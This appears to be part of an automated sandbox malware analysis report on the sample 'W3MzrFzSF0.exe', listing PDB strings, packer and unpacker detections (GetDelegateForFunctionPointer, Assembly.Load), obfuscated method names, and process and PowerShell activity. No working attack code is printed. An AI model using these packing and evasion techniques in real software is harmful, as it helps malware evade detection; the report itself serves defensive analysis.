                      Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: pcaui.exe, 00000008.00000002.4468565676.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468773018.000000000501C000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000000.2258003464.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2475852110.000000003848C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdb source: vbc.exe, 00000006.00000002.2172466807.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000002.4467005035.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdb source: W3MzrFzSF0.exe
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pDqSqZXvqQcT.exe, 00000007.00000002.4467379967.00000000007EE000.00000002.00000001.01000000.0000000D.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467350657.00000000007EE000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2190258976.00000000045B7000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2187500778.00000000043FC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdbSHA256 source: W3MzrFzSF0.exe
                      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2190258976.00000000045B7000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2187500778.00000000043FC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: vbc.pdb source: pcaui.exe, 00000008.00000002.4468565676.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468773018.000000000501C000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000000.2258003464.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2475852110.000000003848C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.pdb93405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: W3MzrFzSF0.exe, 00000000.00000002.2070763334.0000000005FE9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: pcaui.pdbGCTL source: vbc.exe, 00000006.00000002.2172466807.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000002.4467005035.0000000000558000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.W3MzrFzSF0.exe.5670000.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.cs.Net Code: C9lfi6UOWB System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, z2xNW56F1ZH2jZTKon.cs.Net Code: C9lfi6UOWB System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_013947AF push esi; iretd 0_2_013947B2
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_01394659 push edx; iretd 0_2_0139465A
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_013946B9 push ebx; iretd 0_2_013946BA
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_013946BB push edx; iretd 0_2_013946BE
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_013946BF push ebx; iretd 0_2_013946C2
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_052C939C pushfd ; retf 0_2_052CA921
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058BA0C0 push esp; retn 0004h0_2_058BA0DC
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058BCB6A push eax; retf 0_2_058BCB71
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeCode function: 0_2_058BCB68 pushad ; retf 0_2_058BCB69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_004030C0 push eax; ret 6_2_004030C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0040D0E4 push edx; retf 6_2_0040D0E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0040808C push esp; ret 6_2_00408097
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00417257 push 00000020h; iretd 6_2_00417259
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00417260 pushad ; retf 6_2_0041726B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00417A64 push ecx; ret 6_2_00417A78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041EA38 push eax; retf 6_2_0041EA4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_004172D4 pushad ; retf 6_2_0041726B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041EA8D push esp; retf 6_2_0041EA8E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00416797 push ds; iretd 6_2_004167A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058527FA pushad ; ret 6_2_058527F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0585225F pushad ; ret 6_2_058527F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058809AD push ecx; mov dword ptr [esp], ecx6_2_058809B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0585283D push eax; iretd 6_2_05852858
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05851368 push eax; iretd 6_2_05851369
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047627FA pushad ; ret 8_2_047627F9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0476225F pushad ; ret 8_2_047627F9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0476283D push eax; iretd 8_2_04762858
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047909AD push ecx; mov dword ptr [esp], ecx8_2_047909B6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_02814211 pushad ; retf 8_2_028141A8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_02814194 push 00000020h; iretd 8_2_02814196
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0281419D pushad ; retf 8_2_028141A8
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, XsIscADSqAfOW73RNQ.csHigh entropy of concatenated method names: 'Dt8A5uVl4l', 'jbgAs7D1dn', 'J7vAw9lZJY', 'DZnADmKfeu', 'uiGAhSquZI', 'bJPAkPwlZ3', 'hJbAx651t2', 't4JAbLamQ3', 'sWlAmedQI3', 'cl2AEoAQhL'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, cnsSNVMCUYZhqpICBr.csHigh entropy of concatenated method names: 'TFYu7lfLoe', 'nZ5u16xR1V', 'ryuAByNWjA', 'QeKAyjlCIn', 'rgWArNvIMW', 'kKPA4Jd4BN', 'PChALmgcDx', 'cyJAl4I0Bm', 'a6dAoTRyP2', 'xmFASGlbE0'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, dxnwfWo1hwohEfxBel.csHigh entropy of concatenated method names: 'KDBg9b54HI', 'VBSg3spwXi', 'twCgij0Hrt', 'qang5Gg6II', 'Qo3g7NAj93', 'FyKgsHpReh', 'oEYg1FI7pT', 'vFAgw7E7gq', 'll6gDoWYx3', 'jlogMNYsfm'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, l4AVtveKkOdZVCL4LB.csHigh entropy of concatenated method names: 'CDWPviF0Za', 'Uo3PVyXg6D', 'vtEPubsanL', 'zs3PgL1aXP', 'YfIP6MONkG', 'GkMuQT78fb', 'RKBuCswdjA', 'N1cuWxgn98', 'LRcunACgDZ', 'LeCutm3ym6'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, sp1lDdRRnrqqK3bpA0V.csHigh entropy of concatenated method names: 'mnUETFyasX', 'Rh1EzLqPad', 'z6EcUqqHYX', 'fnhcRlSp3j', 'xmOcFMJpx2', 'GtMcakhZhM', 'woWcfc48Zx', 'gBucvObXUN', 'v53cJHAONC', 'duWcVAVU97'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.csHigh entropy of concatenated method names: 'HWiav0ykQt', 'IQBaJtCWNU', 'B4aaVYBBUg', 'pS3aAxip2W', 'MUuau5jyuH', 'U7QaPXxLM3', 'N9OagA60dH', 'RSOa6kWaCV', 'BpKaKNPROS', 'jVHaXpArOq'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, qvsr92fm6GDDkDm7X7.csHigh entropy of concatenated method names: 'duIRgPUKR5', 'vS9R6CW8ki', 'gSqRXAfOW7', 'yRNRqQansS', 'HICRhBrX4A', 'gtvRkKkOdZ', 'SgqAF8reetDQ1fXeH7', 'Ely01JmLid1cbMACtS', 'oQeRRKB4yY', 'tgORa5uN9L'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, i79tYwzmrScsCg7BCX.csHigh entropy of concatenated method names: 'k59Esu4n50', 'gDCEwwgGxe', 'vTbEDbUTSk', 'P4NEe5B8WX', 'OwlEpcU54u', 'IPAEyFKNde', 'aQAErGJRF7', 'XGhE2chMDl', 'fbsE95uab2', 'JIrE3YCuXt'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, xFXs66RfPcaMhhhXaWe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wPGjmxuxKX', 'sQljEkoC5C', 'yBNjctBFj7', 'RYgjjiJwbP', 'YFXjZCg7BN', 'WiHjYOl8se', 'W7pj2QXXWT'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, PPUKR5wZS9CW8kiXFb.csHigh entropy of concatenated method names: 'cokVduJeCG', 'gIZVGruRCO', 'xmRVNV2uUh', 'm1tV8hush9', 'rK8VQc1yO5', 'LoHVCCnjyt', 'zyoVW1YWhv', 'OULVnKmpWN', 'eV5Vt2eP1l', 'sHBVT2yaJA'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, j6G0lPT5d0C3ab4ktI.csHigh entropy of concatenated method names: 'gjMEADBY0U', 'i39Euv0iNI', 'PSbEPDrBk9', 'f7REgOmqFt', 'ICOEmKl1oF', 'IiIE6kKmjC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, A2t7lBLdUoLTXrFHYD.csHigh entropy of concatenated method names: 'bjLgJbJUtv', 'U08gA0DFNA', 'HQ6gPr5YYi', 'GXJPTXSZHg', 'hGZPzIdvtD', 'ysbgUTpR3v', 'gddgR9t625', 'npmgFdJNGj', 'KY6gaKDCwT', 'FwRgfp4j1E'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, MlTvVWW80oPgjXVCSK.csHigh entropy of concatenated method names: 'ORamhTO2cT', 'T2kmx32LDw', 'xJwmmtT2Cu', 'wQfmchxIsq', 'mkFmZB5PS6', 'an8m2WKWE0', 'Dispose', 'tOBbJEMW28', 'ULubVsuQ5X', 'UnVbA7Ki3Z'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, BEm3b2t8ZooiFqvwgO.csHigh entropy of concatenated method names: 'OOtmeiktap', 'yK8mpxTyY8', 'ABYmBNiMah', 'niDmygUZU3', 'FF7mraZn7T', 'gixm43yOlo', 'Sc0mL4SAM6', 'RtPmlEMse9', 'wXtmomreJv', 'QSBmSXaURY'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, mmaSdf0UJqIPKo4hqT.csHigh entropy of concatenated method names: 'vNZHwRO4Y3', 'YN3HDuEn8j', 'RdDHetv0SI', 'I1MHpJUurH', 'UeXHy6Cjqv', 'AQOHrT5iI9', 'NsoHLG55Qk', 'Jv6Hl9UGl7', 'QhbHS5FCob', 'AsrHOr01lS'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, GwuH3CdsRsmh9OqFE9.csHigh entropy of concatenated method names: 'zY5hSs9GTA', 'gmkhInbkoD', 'YnMhd7Q8AK', 'YCshGW7hmD', 'rgAhpEgiXF', 'rRthBi13e6', 'AXGhySQsuU', 'lAehrBLlix', 'nnZh4HVY4K', 'UvbhLZrHr1'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, F1lwPVF41FEZb53qRh.csHigh entropy of concatenated method names: 'gjaiJiYCI', 'bhM5yH5GC', 'efls7PTBx', 'Ux11wvg9X', 'AJ2DCqT1b', 'e6KM1lhlD', 'nBf4eNcQRHG65Q7r6H', 'Wk4oaTCRf3AZFxj6DR', 'SE8bHGOU4', 'FvfEQHEb5'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, e9rxZJNgVmTvgJYWCE.csHigh entropy of concatenated method names: 'ToString', 'pnNkOvAdcq', 'nDfkpT6tbP', 'zYFkB7o5f9', 'y6oky89n6b', 'X63krD2inm', 'umyk48S7y4', 'K0AkLRTDqQ', 'EQQklOgqfB', 'd1Rko4VIPE'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, uSDqqFVdXg1Ch03CNt.csHigh entropy of concatenated method names: 'Dispose', 'MPgRtjXVCS', 'dCJFpSqoYl', 'P2ocKLlTVu', 'l3XRThK2FA', 'SDxRzfQSh2', 'ProcessDialogKey', 'wQ7FUEm3b2', 'TZoFRoiFqv', 'DgOFFg6G0l'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, CIDwwdCastJyY1nYgh.csHigh entropy of concatenated method names: 'iaKxn0RRT3', 'OCSxTwFcfG', 'WwObUYuwdP', 'RkxbRsbIpm', 'I3ExO4IK0p', 'NB3xIKrSvv', 'Dvvx0cZsGa', 'PZ6xd33Dvb', 'vfhxGcpvRR', 'iKIxNnIBfd'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, XsIscADSqAfOW73RNQ.csHigh entropy of concatenated method names: 'Dt8A5uVl4l', 'jbgAs7D1dn', 'J7vAw9lZJY', 'DZnADmKfeu', 'uiGAhSquZI', 'bJPAkPwlZ3', 'hJbAx651t2', 't4JAbLamQ3', 'sWlAmedQI3', 'cl2AEoAQhL'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, cnsSNVMCUYZhqpICBr.csHigh entropy of concatenated method names: 'TFYu7lfLoe', 'nZ5u16xR1V', 'ryuAByNWjA', 'QeKAyjlCIn', 'rgWArNvIMW', 'kKPA4Jd4BN', 'PChALmgcDx', 'cyJAl4I0Bm', 'a6dAoTRyP2', 'xmFASGlbE0'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, dxnwfWo1hwohEfxBel.csHigh entropy of concatenated method names: 'KDBg9b54HI', 'VBSg3spwXi', 'twCgij0Hrt', 'qang5Gg6II', 'Qo3g7NAj93', 'FyKgsHpReh', 'oEYg1FI7pT', 'vFAgw7E7gq', 'll6gDoWYx3', 'jlogMNYsfm'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, l4AVtveKkOdZVCL4LB.csHigh entropy of concatenated method names: 'CDWPviF0Za', 'Uo3PVyXg6D', 'vtEPubsanL', 'zs3PgL1aXP', 'YfIP6MONkG', 'GkMuQT78fb', 'RKBuCswdjA', 'N1cuWxgn98', 'LRcunACgDZ', 'LeCutm3ym6'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, sp1lDdRRnrqqK3bpA0V.csHigh entropy of concatenated method names: 'mnUETFyasX', 'Rh1EzLqPad', 'z6EcUqqHYX', 'fnhcRlSp3j', 'xmOcFMJpx2', 'GtMcakhZhM', 'woWcfc48Zx', 'gBucvObXUN', 'v53cJHAONC', 'duWcVAVU97'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, z2xNW56F1ZH2jZTKon.csHigh entropy of concatenated method names: 'HWiav0ykQt', 'IQBaJtCWNU', 'B4aaVYBBUg', 'pS3aAxip2W', 'MUuau5jyuH', 'U7QaPXxLM3', 'N9OagA60dH', 'RSOa6kWaCV', 'BpKaKNPROS', 'jVHaXpArOq'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, qvsr92fm6GDDkDm7X7.csHigh entropy of concatenated method names: 'duIRgPUKR5', 'vS9R6CW8ki', 'gSqRXAfOW7', 'yRNRqQansS', 'HICRhBrX4A', 'gtvRkKkOdZ', 'SgqAF8reetDQ1fXeH7', 'Ely01JmLid1cbMACtS', 'oQeRRKB4yY', 'tgORa5uN9L'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, i79tYwzmrScsCg7BCX.csHigh entropy of concatenated method names: 'k59Esu4n50', 'gDCEwwgGxe', 'vTbEDbUTSk', 'P4NEe5B8WX', 'OwlEpcU54u', 'IPAEyFKNde', 'aQAErGJRF7', 'XGhE2chMDl', 'fbsE95uab2', 'JIrE3YCuXt'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, xFXs66RfPcaMhhhXaWe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wPGjmxuxKX', 'sQljEkoC5C', 'yBNjctBFj7', 'RYgjjiJwbP', 'YFXjZCg7BN', 'WiHjYOl8se', 'W7pj2QXXWT'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, PPUKR5wZS9CW8kiXFb.csHigh entropy of concatenated method names: 'cokVduJeCG', 'gIZVGruRCO', 'xmRVNV2uUh', 'm1tV8hush9', 'rK8VQc1yO5', 'LoHVCCnjyt', 'zyoVW1YWhv', 'OULVnKmpWN', 'eV5Vt2eP1l', 'sHBVT2yaJA'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, j6G0lPT5d0C3ab4ktI.csHigh entropy of concatenated method names: 'gjMEADBY0U', 'i39Euv0iNI', 'PSbEPDrBk9', 'f7REgOmqFt', 'ICOEmKl1oF', 'IiIE6kKmjC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, A2t7lBLdUoLTXrFHYD.csHigh entropy of concatenated method names: 'bjLgJbJUtv', 'U08gA0DFNA', 'HQ6gPr5YYi', 'GXJPTXSZHg', 'hGZPzIdvtD', 'ysbgUTpR3v', 'gddgR9t625', 'npmgFdJNGj', 'KY6gaKDCwT', 'FwRgfp4j1E'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, MlTvVWW80oPgjXVCSK.csHigh entropy of concatenated method names: 'ORamhTO2cT', 'T2kmx32LDw', 'xJwmmtT2Cu', 'wQfmchxIsq', 'mkFmZB5PS6', 'an8m2WKWE0', 'Dispose', 'tOBbJEMW28', 'ULubVsuQ5X', 'UnVbA7Ki3Z'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, BEm3b2t8ZooiFqvwgO.csHigh entropy of concatenated method names: 'OOtmeiktap', 'yK8mpxTyY8', 'ABYmBNiMah', 'niDmygUZU3', 'FF7mraZn7T', 'gixm43yOlo', 'Sc0mL4SAM6', 'RtPmlEMse9', 'wXtmomreJv', 'QSBmSXaURY'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, mmaSdf0UJqIPKo4hqT.csHigh entropy of concatenated method names: 'vNZHwRO4Y3', 'YN3HDuEn8j', 'RdDHetv0SI', 'I1MHpJUurH', 'UeXHy6Cjqv', 'AQOHrT5iI9', 'NsoHLG55Qk', 'Jv6Hl9UGl7', 'QhbHS5FCob', 'AsrHOr01lS'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, GwuH3CdsRsmh9OqFE9.csHigh entropy of concatenated method names: 'zY5hSs9GTA', 'gmkhInbkoD', 'YnMhd7Q8AK', 'YCshGW7hmD', 'rgAhpEgiXF', 'rRthBi13e6', 'AXGhySQsuU', 'lAehrBLlix', 'nnZh4HVY4K', 'UvbhLZrHr1'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, F1lwPVF41FEZb53qRh.csHigh entropy of concatenated method names: 'gjaiJiYCI', 'bhM5yH5GC', 'efls7PTBx', 'Ux11wvg9X', 'AJ2DCqT1b', 'e6KM1lhlD', 'nBf4eNcQRHG65Q7r6H', 'Wk4oaTCRf3AZFxj6DR', 'SE8bHGOU4', 'FvfEQHEb5'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, e9rxZJNgVmTvgJYWCE.csHigh entropy of concatenated method names: 'ToString', 'pnNkOvAdcq', 'nDfkpT6tbP', 'zYFkB7o5f9', 'y6oky89n6b', 'X63krD2inm', 'umyk48S7y4', 'K0AkLRTDqQ', 'EQQklOgqfB', 'd1Rko4VIPE'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, uSDqqFVdXg1Ch03CNt.csHigh entropy of concatenated method names: 'Dispose', 'MPgRtjXVCS', 'dCJFpSqoYl', 'P2ocKLlTVu', 'l3XRThK2FA', 'SDxRzfQSh2', 'ProcessDialogKey', 'wQ7FUEm3b2', 'TZoFRoiFqv', 'DgOFFg6G0l'
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, CIDwwdCastJyY1nYgh.csHigh entropy of concatenated method names: 'iaKxn0RRT3', 'OCSxTwFcfG', 'WwObUYuwdP', 'RkxbRsbIpm', 'I3ExO4IK0p', 'NB3xIKrSvv', 'Dvvx0cZsGa', 'PZ6xd33Dvb', 'vfhxGcpvRR', 'iKIxNnIBfd'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
